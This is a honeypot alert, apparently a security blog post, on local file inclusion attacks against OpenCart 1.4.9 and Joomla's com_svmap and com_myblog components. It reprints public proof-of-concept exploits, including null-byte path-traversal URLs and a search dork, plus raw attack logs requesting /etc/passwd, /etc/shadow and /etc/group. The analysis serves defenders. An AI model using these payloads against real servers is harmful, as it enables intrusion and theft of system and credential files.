Our web server honeypot log analysis has picked up some targeted local file inclusion (LFI) attacks against few specific PHP components.
OpenCart v1.4.9 LFI
Here is PoC exploit code:
#### Title : OpenCart 1.4.9 LFI Multiple Vulnerability# Author : KedAns-Dz# E-mail : ked-h@hotmail.com# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)# Twitter page : twitter.com/kedans# platform : php# Impact : Multi LFI# Tested on : Windows XP sp3 FR#### Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )### [»] Go0gle Dork : "Powered by opencart 1.4.9"#### Exploit : http://[localhost]/[Path]/index.php?route=common/seo_url&product_id=[LFI]%00http://[localhost]/[Path]/index.php?route=common/seo_url&category_id=1&path=[LFI]%00http://[localhost]/[Path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00=================================================================================================
Attack Examples
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
Notice that these LFI payloads are using Nul Bytes (%00) to terminate the injection and then appending the expected/allowed file extension (.php).
Joomla Component com_svmap v1.1.1
Here is PoC exploit code:
================================================================================================ Title : Joomla Component com_svmap v1.1.1 LFI Vulnerability Vendor : http://www.la-souris-verte.com Date : Monday, 05 April 2010 (Indonesia) Author : Vrs-hCk Contact : ander[at]antisecurity.org Blog : http://c0li.blogspot.com/ ================================================================================================ [+] Exploit http://[site]/[path]/index.php?option=com_svmap&controller=[LFI] [+] PoC http://localhost/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 ================================================================================================
Attack Examples
91.215.216.44 - - [08/Jan/2012:15:07:15 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:16 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:19 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:19 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:20 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:20 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:21 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:22 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:22 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
Joomla Component com_blog directory traversal
Here is PoC exploit code:
[~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_blog LFI Vulnerability[~] Author : DevilZ TM By D3v1l[~] Homepage : http://www.DEVILZTM.com[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@gmail.com [~]######################################### ExploiT #################################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI] [~] ExploiT : ../../../../../../../../etc/passwd%00 [~] Example : http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00
Attack Examples
69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
![[Honeypot Alert] Multiple Local File Inclusion Attacks](https://www.trustwave.com/hs-fs/hubfs/Web/Spiders/2024/spider_01-mob.png?width=450&height=250&name=spider_01-mob.png)